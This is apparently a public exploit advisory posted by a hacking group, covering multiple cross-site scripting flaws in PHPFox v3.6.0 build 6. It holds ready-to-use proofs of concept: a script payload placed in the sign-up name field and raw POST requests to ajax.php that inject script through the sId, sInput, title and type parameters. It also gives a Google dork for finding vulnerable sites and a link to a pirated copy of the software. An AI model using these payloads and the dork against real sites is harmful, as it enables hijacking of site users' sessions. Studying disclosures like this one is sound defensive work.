------------------------------------------------------------ Exploit Title: PHPFox v3.6.0 (build6) Multiple Cross-Site Scripting vulnerabilities ------------------------------------------------------------ Author: #BHG Security Center Date: Saturday, October 12, 2013 Vendor: http://www.phpfox.com Software Link: http://dl.nuller.ir/PhpFox.Community.Edition.v3.6.0.Build.6.PHP.NULL-iND%5BNuLLeR.iR%5D.zip Vulnerable Version(s): v3.6.0.Build.6 is vulnerable. Tested Version: 3.6.0.Build.6 Vulnerability Type: Cross-Site Scripting Google Dork: "Powered By PHPFox Version 3.6.0"‎ Risk Level: High Saftware Price : 299 $ Tested on: Windows, PHP 5.2 Vulnerability Video : http://www.youtube.com/watch?v=Yw7Wgr4LtGo&feature -- Vulnerability discovered by: Net.Edit0r ( Dariush Nasirpour) - Email : Black.hat.tm@gmail.com ------------------------------------------------------------ == Proof of concept == ------------------------------------------------------------ [-] Description : [-] PoC 1.1: Xss Code Injection Join Field : 1) Xss Code : 2- Encode to : <script>alert(12)</script> 3- Put in First name Sign Up 4- After Login get your mouse on Recent Logins 5- and you will see Xss Code was successful ------------------------------------------------------------ Vulnerable File(s): [+] ajax.php Vulnerable Parameter(s): [+] sId [+] sInput [+] title [+] type [-] PoC 2.2: ## URL encoded POST input ( sId & sInput ) was set to ## Request POST /upload/static/ajax.php HTTP/1.1 =undefined&core[ajax]=true&core[call]=captcha.reload&core [is_admincp]=0&core[is_user_profile]=0&core[profile_user_id] =0&core[security_token]=572157ee6d639d835e70475f46a6ef74&sId=[Inject XSS Code]&sInput=[Inject XSS Code] [-] PoC 3.3: ## URL encoded POST input ( title & type ) was set to " onmouseover=prompt(951977) bad=" ## Request POST /upload/static/ajax.php HTTP/1.1 core[ajax]=true&core[call]=share.popup&core[security_token]=572157ee6d639d835e70475f46a6ef74 &feed_id=1&height=300&is_feed_view=1&sharemodule=event &title=[Inject XSS Code]&type=[Inject XSS Code]&url=http%3A%2f%2fblack-hg.org%2findex.phpF%26width%3D550 ------------------------------------------------------------ Timeline: ------------------------------------------------------------ Advisory Publication: September 18, 2013 [without technical details] Vendor Notification: September 18, 2013 Public Disclosure: October 12, 2013 #BHG Security Center # Gr33tz: # Blackhat Group Members : 3H34N,,G3n3Rall,l4tr0d3ctism,NoL1m1t,b3hz4d # HUrr!c4nE,E2MA3N,solt6n,Dj.TiniVini